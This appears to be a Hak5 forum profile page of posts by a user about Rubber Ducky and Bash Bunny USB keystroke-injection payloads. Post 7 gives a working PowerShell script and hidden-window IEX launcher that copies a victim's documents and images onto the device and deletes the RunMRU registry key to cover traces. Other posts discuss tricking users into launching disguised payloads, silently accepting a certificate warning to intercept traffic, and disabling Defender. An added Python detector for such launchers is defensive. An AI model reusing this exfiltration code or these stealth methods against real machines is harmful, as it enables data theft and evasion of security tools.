Hak5 Forums
About PoSHMagiC0de
  1. A help to simplify payloads

    Sorry for the late response. Busy guy. Yeah, you shouldn't have to change the execution policy. I test all my scripts on Restricted. The reason it should work is that you are not (technically) running a script. The powershell line is actually an inline command, so it will run even with Restricted policy. In the powershell one-liners I am not running the other script but reading in the contents as a string and then running it as an expression. I looked through your steps; I see you may be missing 1 final step. Grab the script Invoke-SMBExfil.ps1 from my BBTPS project in my repo. I linked it in the thread above. The duckexfil uses that script to do its thing. So you need that DuckExfil.ps1 and Invoke-SMBExfil.ps1 in the same folder.
  2. how to open folder on target as decoy then script?

    Still, no can do without noticeable interaction. The PC will need to be told somehow to be a client. You can run all the stuff you want on the Bunny, but it is like another machine physically separated from the PC even though it is plugged into the USB port. Unless there is a service on that PC that is looking for something to come up on the USB port that it wants to interact with. Network is the same thing: you need a network service to interact with, and most likely credentials for that service or an exploit. The only thing the BB can do that immediately interacts directly with the PC is HID, but it is visible.
  3. how to open folder on target as decoy then script?

    vbs, ps1, compiled exe in native or .NET, you can make them all silent. The question is how is the payload firing off while they are looking at pictures? I avoided this topic because I knew it would be a rabbit hole. Here is why. So, how are the pic folders going to display? USB storage shows the whole UDisk, and autorun no workie on USB flash drives. So, you need them to browse pictures on the BB and not payloads or loot or all the other folders. Next, you need a way to execute the script. Quacking it will take control of the keyboard and start popping up stuff and typing. The only way I can see is tricking the user to click on a shortcut which would launch your payload and then show the pic folders, but the question becomes how does the shortcut lnk file know what drive the BB was assigned so it points at everything correctly. Of course you could use powershell to load an ad-hoc agent (yes, I love calling the code that starts or facilitates a whole remote process the agent) of your making to get the drive and all that, fire off the payload and then fire off an explorer process pointing to the now known drive of the BB and pictures. Ultimately, the BB is going to have to quack the payload or the user is going to have to click on a payload/launcher that may be disguised as a pic to initiate the malware.
  4. how to open folder on target as decoy then script?

    The issue I see is how are you going to execute your script when the picture or whatever has focus. At any time, if the victim is watching their machine they will see the quack commands, because you will need the window you are typing them in to have focus. Them clicking off the window will break focus and break the payload.
  5. Bash Bunny Studio

    Nice. I was going to make a web interface for my project but... was going to hand it over to Davee since he has that nice interface for the PS, but I am on my own. Will have to check it out when I get time to see how flexible it is.
  6. A help to simplify payloads

    One line you do have to change is to put in the name of the loot folder on the Duck SSD. In the duckexfil file, look for the $duckloot variable; it will have, in quotes, where to enter the name of the folder to exfil to. It also assumes you have the scripts in a "payloads" folder right off the root of the Ducky. If that is not the case, that folder name will need to be changed in the duckexfil also, under the $payloaddir variable. I also mentioned I do not know what label Twin Duck gives itself when it mounts as storage, so you will need to get that and change the 2 labels that have "-" in them to the label Twin Duck gives. One is in the one-line launcher and the other is in the duckexfil to get the duck drive. How it should work is the one-liner launcher should launch powershell and get the drive for the Twin Duck, combine it with the "payloads\DuckExfil.ps1" file and use get-content, encoding it all as a string into memory and then outputting it as one solid string rather than a string array. (Posh 2.0 did not have the "-raw" switch for get-content to get files as-is, so it almost always returns arrays that cannot be invoked as scripts, so I pipe it to Out-String to make it a single string.) It invokes that script, which loads the function into memory. You then run the function, which will build the paths in memory it needs to access the RD Twin Duck drive and respective folders. You also build a list of file wildcards to get. With all that, the script pulls in and invokes the smbexfil script, which puts the function into memory, and then it runs the function with the parameters it needs. Now, if you wish to see it in action for testing, remove the "-w hidden" parameter from the launcher and the window will not vanish. Good for testing to see if the script is running or quits immediately. I would also (for testing) monitor the duck folder to see if files are going there. Oh, the loot folder has to exist.

    A quick way to test is to just run the smbexfil script by itself on the victim with the RD plugged in with storage available, quacking nothing. You should see it and be able to hand-run the script with parameters to copy maybe just text files to it. I do not have a RD anymore so I am unable to test with TD. Replaced it with a BashBunny, so I do not know how the TD does things, but I do not see why this is not working.
  7. A help to simplify payloads

    Man, been a busy week. Yeah, the script I recommended is to be used as almost a complete replacement for using CMD files. It takes inclusions as arrays and is completely powershell. What I meant by using it is that on the Rubber Ducky you are limited in interactivity with your commands, unlike the BB, so with that script you will need to create a launcher script to keep the quack command small. It will be a two-stager only, so you can use the 1st stage as your config script.

    # This is DuckExfil.ps1
    function Invoke-DuckExfil {
        $exfilfolder = "$env:userprofile\Documents\"
        $duckDrive = (gwmi -class win32_volume -f {label='-'}).Name
        $payloaddir = "payloads\"
        $duckpayloads = join-path $duckDrive $payloaddir
        $duckloot = join-path $duckdrive "loot folder on duck\"
        #Documents
        $docs = @("*.csv", "*.doc", "*.docx", "*.odt", "*.ods", "*.odg", "*.odp", "*.pdf", "*.pps", "*.txt", "*.tex", "*.ltx", "*.rtf", "*.xls", ".xlsx")
        #Images
        $img = @("*.gif", "*.jpg", "*.jpeg", "*.png", "*.tiff", "*.psd", "*.webp")
        #And other formats that I will not include because it is monotonous.
        #Combine into 1 arraylist
        $filetypes = [System.Collections.ArrayList]::new()
        $filetypes.Addrange($docs)
        $filetypes.Addrange($img)
        #Get the smbexfil script and run it with parameters.
        IEX (gc (join-path $duckpayloads "Invoke-SMBExfil.ps1") -encoding String | Out-String)
        Invoke-SMBExfil $exfilfolder $duckloot $filetypes
        $wsh = New-Object -ComObject WScript.Shell
        $wsh.SendKeys('{CAPSLOCK}')
        sleep -m 250
        $wsh.SendKeys('{CAPSLOCK}')
        sleep -m 250
        $wsh.SendKeys('{CAPSLOCK}')
        sleep -m 250
        $wsh.SendKeys('{CAPSLOCK}')
        Remove-Item HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
    }

    And the quack command should be something like this:

    STRING powershell -NoP -W hidden -C {$duck=(join-path (gwmi -class win32_volume -f "label='-'").Name "payloads\DuckExfil.ps1");IEX (gc $duck -encoding String | Out-String);Invoke-DuckExfil}

    I do not know what the Twin Duck label is, so where the labels are is where the label the RB Twin Duck shows up as goes. With the ducky commands to launch a cmd window done first and then the string command above, you should get the window disappearing and files copying, ending with that keyboard light sequence when done. Config of paths and stuff is done in the DuckExfil.ps1 file. Just showing another option.
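As an added example from the defender's side (not code from this thread or from the author's BBTPS project), the Python below flags process command lines that share the shape of the launcher above: a hidden window, the profile skipped, and a script body read from disk and handed to Invoke-Expression, which is exactly why the Restricted execution policy never gets consulted (the point made in post 1). The sample command lines are constructed; switch-prefix matching (-W, -NoP, -C) is assumed from how powershell.exe abbreviates its switches.

```python
import re

# Constructed sample process command lines (not taken from the thread); the first
# has the shape of the two-stage Ducky launcher, the others are benign or partial.
SAMPLE_CMDLINES = [
    "powershell -NoP -W hidden -C {$d=(join-path (gwmi -class win32_volume "
    "-f \"label='-'\").Name \"payloads\\Stage2.ps1\");IEX (gc $d -encoding String "
    "| Out-String);Invoke-Stage2}",
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "powershell -Command \"Get-Content C:\\logs\\app.log | Select-String ERROR\"",
    "powershell -NoP -W Hidden -C \"Set-MpPreference -DisableRealtimeMonitoring $true\"",
]

# Each indicator is one trait of the launcher pattern. powershell.exe accepts
# unambiguous switch prefixes (-W, -NoP, -C), so the patterns allow abbreviations.
INDICATORS = {
    # console window hidden from the person at the keyboard
    "hidden_window": re.compile(r"-w[a-z]*\s+hidden\b", re.I),
    # profile scripts skipped
    "no_profile": re.compile(r"-nop[a-z]*\b", re.I),
    # inline -Command: not a script file, so the execution policy is not consulted
    "inline_command": re.compile(r"-c(?:ommand)?\s", re.I),
    # script text read from disk and handed to Invoke-Expression
    "iex_of_file": re.compile(r"\b(?:iex|invoke-expression)\b.*\b(?:gc|get-content|cat|type)\b", re.I),
    # Defender settings changed from the command line (post 15 above)
    "defender_tamper": re.compile(r"set-mppreference\b.*-disable", re.I),
}


def classify(cmdline):
    """Return (indicator names hit, suspicious flag) for one command line."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    # A hidden window combined with IEX of file contents is the launcher shape;
    # any Defender tampering is flagged on its own.
    suspicious = "defender_tamper" in hits or {"hidden_window", "iex_of_file"} <= set(hits)
    return hits, suspicious


def scan(cmdlines):
    """Return the (index, hits) pairs that should be raised for review."""
    return [(i, classify(c)[0]) for i, c in enumerate(cmdlines) if classify(c)[1]]


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_CMDLINES):
        print(f"line {idx}: {', '.join(hits)}")
```

Feed it the CommandLine field of process-creation events (Sysmon event 1 or Security 4688 with command-line auditing on) instead of the constructed list.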
  8. A help to simplify payloads

    I do not have my Rubber Ducky anymore but have a BashBunny and a script in PowerShell for SMB exfiltration. It can be located in my BBTPS project at the link below. You just need to create a one-line stager to get the path to the Rubber Ducky, then get-content the script, invoke it, and then run the function with the base path to the files, the path to where the files are going on the Rubber Ducky, and an array of extensions or filenames you want from that folder. Of course all the extensions you want will make the command longer, unless you build a wrapper script for it that will pass it all the extensions, or modify the script to invoke the command at the end of it with the parameters. https://github.com/PoSHMagiC0de/BBTPS/tree/master/jobs/totalp0wn Yeah, it is called smbexfil but it will take any kind of path you give it. I only called it that because I pass it a UNC path in the project to exfil via the SMB path to the BB.
  9. So, this is a never-ending adventure for me. Using dd in many different ways and the built-in USB image writer in the Ubuntu-like OSes, I have tried to make bootable USBs from bootable ISO images. I would have to say it is hit and miss. The three methods I have tried are:

    1) dd the whole disk with the image (/dev/sdb)
    2) Create a partition on the USB stick and dd in there (/dev/sdb1)
    3) Use the USB Stick Formatter and then the USB Image Writer

    Oh, I have also run sync at the end of each to make sure the USB is synced before safely ejecting it. One of the three above usually works, but I have run across some that do not work at all with the above methods. What I do know is if I jump on a Windows system and use Rufus portable it will always work. I mean it has never failed me. If the ISO is bootable, it will be bootable on the USB... always. Question: is there a 100% proven way to write a bootable ISO to a USB stick with Linux and have it be bootable? A good example of an ISO to try is Hiren's. That ISO would not boot up until I used Rufus to do it.
  10. Not one of the hak5 products is working properly

    The simple explanation for this situation is this. Although the computers in the library are for public use, they are owned by the library. When they break, the library has to requisition public funds to get them fixed. Either they have to call in a contractor or the city IT department has to fix it. So, it has private ownership even if it is a public service. I know somewhere around that machine there is a terms of service. So, it would be like if my neighbors gave me money (taxes in gov terms), and I used that money to put in a drinking fountain in my front yard that everyone can use (open to the public). If it has plumbing issues and stuff, I will have to pay to fix it since I bought it and am the owner... even if the neighbors help by giving more money. Ultimately it will be in my name (library machines are property of the library or city). So, does that mean I am not going to call the police if I see one of the neighborhood kids pissing in it? Does public use mean he can piss in it? Pretty much, when you try and compromise the library machine or do anything outside the intended use of the service, you are essentially pissing in it, and if you are caught they will call the police on you. Now, I would be wary about doing illegal things on those machines too. They are property of the city, and by extension the gov. That means that traffic can be monitored by any number of agencies, and the library has cameras. Your agent calls out at a certain time, they have that timestamped and camera footage of you sitting at the machine. Now they only have to find you. Plus, the most you will probably get from the machine, at great risk, is folks browsing porn sites. :-P
  11. [PAYLOAD] BunnyMute

    Oh, might as well show the other method too just in case.

    function Set-Mute {
        $wshell = new-object -ComObject wscript.shell
        $mutecmd = "`$wshell.SendKeys([char]174);"
        iex ("$mutecmd" * 100)
    }

    This turns the volume down by repeatedly hitting the keyboard volume-down key 100x. No mixer popup or timings you have to worry about.
  12. [PAYLOAD] BunnyMute

    This can be reduced by including no shortcut or anything, just a script. Heck, it can even be quacked all out so as not to require even a script file.

    function Set-Mute {
        IEX "sndvol.exe -f 49825268"
        $wshell = New-Object -ComObject wscript.shell
        sleep -Milliseconds 500
        $wshell.SendKeys("{END}")
        $wshell.SendKeys("{ESCAPE}")
    }

    This can be one-lined as:

    powershell.exe -NoP -W Hidden -C "IEX 'sndvol.exe -f 49825268';$wshell = New-Object -ComObject wscript.shell;sleep -Milliseconds 500;$wshell.SendKeys('{END}');$wshell.SendKeys('{ESCAPE}')"

    As a quack command it would look like this:

    Q STRING "powershell.exe -NoP -W Hidden -C \"IEX 'sndvol.exe -f 49825268';\$wshell = New-Object -ComObject wscript.shell;sleep -Milliseconds 500;\$wshell.SendKeys('{END}');\$wshell.SendKeys('{ESCAPE}')\""

    The small sleep in the script is needed because it takes some time for sndvol.exe to launch and the script runs really fast. You can play with the delay if on a slower machine that takes longer to launch it. Probably 1 second would not be a bad all-arounder. So, this I may use in the proxy script I am optimizing. This is the way I like to help. People build what they want, and I like to come in and help by making it better. A lot better than doing it all for someone else and they walk away learning diddly. Good job discovering the exe that launches the mixer. Most would send the keystrokes for turning down the volume and just repeat it 50-100x.
  13. [PAYLOAD] Proxy Interceptor

    Whoot. I perfected this payload, well almost. I am switching it back to file mode for the cert since you are pulling from USB. Less work and easier to deal with. I am too used to dealing with agents and agent servers that I over-complicated the pull of the cert. Going to simplify it from handling raw, in-memory data to handling the cert files. I also ran into an issue with PS2.0 compatibility, but I know what to do to fix that really fast from a test I did here in the office. I can finish this off and have a fully working improved version of this payload either tonight or tomorrow. I have been working on the BBTPS after I got hung up with the security warning that cannot be selected by HID commands, but because I was being dense I saw it wasn't a UAC prompt, meaning I still had control of the screen even though the script does stop. No problem. I just added a job to fire off before adding the cert that waits a second or 2, so when I add the cert and the security warning pops up, the job selects the window via code and does an alt-y sendkey, which worked. So, only 1 quack command and 2-3 seconds to run. Whoot. Could make it more stealthy by muting sound before adding the cert so there is no warning sound and then unmuting when done, but that can be later. Where do you want this thing, since it is really yours and I am just improving it? :-P Or, I will just be forkin ya.
  14. BBTPS upcoming updates

    Lol. I am camera shy and have no video experience. There are guys at my local hackerspace that seem to enjoy doing videos and stuff. I may tag them to see if they want to take up the project. :-P
  15. PasswordGrabber by LazaGne Not Working

    I haven't tested yet to see if "Set-MpPreference" affects all AV on the machine (like AVAST) or just Windows Defender.